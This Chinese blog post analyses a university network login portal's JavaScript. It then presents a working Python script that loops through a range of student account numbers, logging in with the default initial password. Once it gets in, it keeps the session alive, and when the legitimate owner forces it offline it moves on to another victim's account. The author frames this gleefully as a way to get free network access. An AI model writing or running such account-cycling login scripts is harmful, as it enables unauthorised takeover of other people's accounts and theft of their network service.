在浏览器的验证窗口中输入登陆名和密码后,成功后会弹出一个小的新窗口,如果不小心关闭了这个窗口,则就会无法联网。如果说我在一个不带有桌面的Linux系统中,我是不能够通过浏览器接入网络的,虽然提供了不同系统的不同版本的客户端(没有用过),但是还是想自己做一个玩玩,同时依据上一篇博客中获取到的帐号进行尝试登陆。
1. 页面分析
首先还是先来看一下登陆验证页面,因为上一片博客中已经对其进行了分析,这里我们看看其它的:
上边的代码是登陆成功后设置 document.form1.uid.value 的值,在Cookie中保存值,打开新窗口。
# 新窗口打开的网址为: http://192.0.0.6/login.html。其中location.search相当于无用,可以不管
# "user_login":窗体的名称
# width,height:窗口的宽和高
window.open("login.html"+location.search,"user_login","width=428,height=296");
执行完上述代码之后就弹出了如下的登陆保持窗口(关掉之后就会断网):
当这个新窗口开启后就会执行下边的代码:
<script type="text/javascript">
// 调用父窗口(也就是打开这个窗口的登陆验证窗口)中的get_uid()函数,获取uid(登陆成功后返回的一串数字)。
document.form1.uid.value=window.opener.get_uid();
// 调用父窗口的关闭函数(其实那个函数什么都没有做,啥都没有用)
window.opener.do_close();
document.getElementById("title1").innerHTML=window.opener.get_uname()+"已经登录。<br/>请不要关闭本页面,关闭本页面后将自动下网。";
if(document.form1.uid.value != "")
{
//调用get_url()方法
setTimeout("get_url()", 1000);
}
else
{
alert("登录失败");
window.close();
}
</script>
下来我们看一下 get_url 方法是干什么的,实际上就是将父窗口重定为到浙大软件学院的网址。
function get_url()
{
// 实际上跑去访问 http://192.0.0.6/cgi-bin/get_url 地址,而这个地址返回的是一个网址
var res=postData("/cgi-bin/get_url"+location.search, "get", "");
// 判断返回的是不是一个网址,如果是就将父窗口调转到这个网址(实际上这个网址就是 http://www.cst.zju.edu.cn/ 浙大软院的网址)
var p=/^http:\/\/.+/;
if(p.test(res))
window.opener.jump_to(res);
else
window.opener.history.go(-2);
return;
}
页面中还有一个方法 keeplive() 方法,看着好像很厉害的样子,然并卵,其实只有在点击 查看按钮的时候才响应,不过我们模拟登陆的时候却需要这个处理逻辑,判断我自己是否已经被别人强退,如果强退了之后,我们就尝试登陆下一个,然后循环往复,总会有不在使用的吧(嘿嘿嘿,真是机智。。)
function keeplive()
{
var con=postData("/cgi-bin/keeplive", "post", "uid="+document.form1.uid.value);
//alert(con);
var p=/^[\d]+,[\d]+,[\d]+$/; if(p.test(con))
{
var arr=new Array;
arr=con.split(',');
document.getElementById("time_long").innerHTML=format_time(arr[0]);
document.getElementById("balance_in").innerHTML=format_flux(arr[1]);
document.getElementById("balance_out").innerHTML=format_flux(arr[2]);
err=0;
}
else
{
if(err>=5)
{
alert("与服务器的连接中断");
window.close();
return;
}
else if(con=="status_error")
{
alert("您的帐户余额不足");
window.close();
return;
}
else if(con=="available_error")
{
alert("您的帐户被禁用");
window.close();
return;
}
else if(con=="drop_error")
{
alert("您被强制下线");
window.close();
return;
}
else if(con=="flux_error")
{
alert("您的流量已超支");
window.close();
return;
}
else if(con=="minutes_error")
{
alert("您的时长已超支");
window.close();
return;
}
else
{
err++;
} } }
其比较重要的方法是 do_logout,我们之所以关闭了这个页面就无法上网的原因就是这个函数的啦。
// 访问 /cgi-bin/do_logout,并注销这次登陆,好吧,只要我不主动去调用它就永远不会注销落。
function do_logout(flg)
{
if(flg!="" && !confirm("是否要登出?"))
return;
//clearTimeout(tm);
var con=postData("/cgi-bin/do_logout", "post", "uid="+document.form1.uid.value);
//alert(con);
if(con=="logout_ok")
{
//clearTimeout(tm);
window.close();
}
else
{
alert("操作失败");
}
}
2. 过程实现
理清楚了页面的代码逻辑,下来就要用python来模拟登陆。过程主要为:获取未改密码的用户帐,然后在这些帐号中选择未登陆帐号登陆,登陆成功后一直监视登陆后的情况,如果被强制下线,我们就尝试另一个帐号。
#!/usr/bin/python
# -*- coding:utf-8 -*- import urllib
import urllib2
import re
import os
import time class PseudoLogin:
def __init__(self):
self.login_url = "http://192.0.0.6/cgi-bin/do_login"
self.status_url = "http://192.0.0.6/cgi-bin/keeplive"
self.logout_url = "http://192.0.0.6/cgi-bin/do_logout"
self.headers = {}
self.headers["User-Agent"]="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
self.headers["Content-Type"] = "application/x-www-form-urlencoded"
# 需要更改起始和结束帐号
self.start = *****
self.end = ******
self.check_time = 5
# 当前登陆的帐号
self.current = self.start
# 登陆成功后返回的数字字符串
self.uid = "" # 循环测试帐号,知道有一个帐号可以通过初始密码登陆
def cycle_login(self):
# 初始密码
password="*************"
# 匹配全是数字的字符串
pattern = re.compile(r"^[\d]+$")
# 当已经访问到最后的时候,且最后一个帐号没有登陆成功的时候,又重头来一次
if (self.current >= self.end):
print "将重头再来一次.."
self.current = self.start
for username in range(self.current,self.end + 1):
self.current = username
ret = self.access(str(username),password)
if re.match(pattern,ret):
self.uid = ret
print "已经成功登陆...,可以上网了"
print "当前网号为: "+str(username)
print "uid为: " + ret
return True return False def access(self,username,password):
data="username="+username+"&password="+password+"&drop=0"+"&type=1&n=100"
req = urllib2.Request(self.login_url,data=data,headers=self.headers)
res = urllib2.urlopen(req)
content = res.read()
print "the login result : " + content
return content # 获取登陆上网后的状态
def get_status(self):
data="uid="+self.uid
req = urllib2.Request(self.status_url,data=data,headers=self.headers)
res = urllib2.urlopen(req)
content = res.read()
print "the keepalive result : " + content
return content # 登出
def logout(self):
data="uid="+self.uid
#data="uid="+identity
req = urllib2.Request(self.logout_url,data=data,headers=self.headers)
res = urllib2.urlopen(req)
content = res.read()
print "the logout result : " + content
return content # 登陆上网之后一直监测上网状态,如果被强制下线就返回
def suffer(self):
# 循环测试,直到能够登陆
while(not self.cycle_login()):
pass
# 当返回的是三个数字并且已逗号隔开的时候表示依然在线
pattern = re.compile(r"^[\d]+,[\d]+,[\d]+$")
# 每过5秒访问一下状态
while(True):
time.sleep(self.check_time)
status = self.get_status()
if re.match(pattern,status):
print "it is still online"
else:
print "sorry you are offline"
# 如果被强制下线,则自动加1,不然又会登上这个帐号
self.current = self.current + 1
print "下线后需要等一会儿才能再登陆"
time.sleep(30)
break
# 如果while循环退出表示上网失败了
return False # 这个函数将会一直执行
def enjoy(self):
while(not self.suffer()):
pass login = PseudoLogin()
login.enjoy()
执行上述脚本(./cstlogin > /dev/null 2>&1 &)后,就会在后台运行,不再掉线啰,nice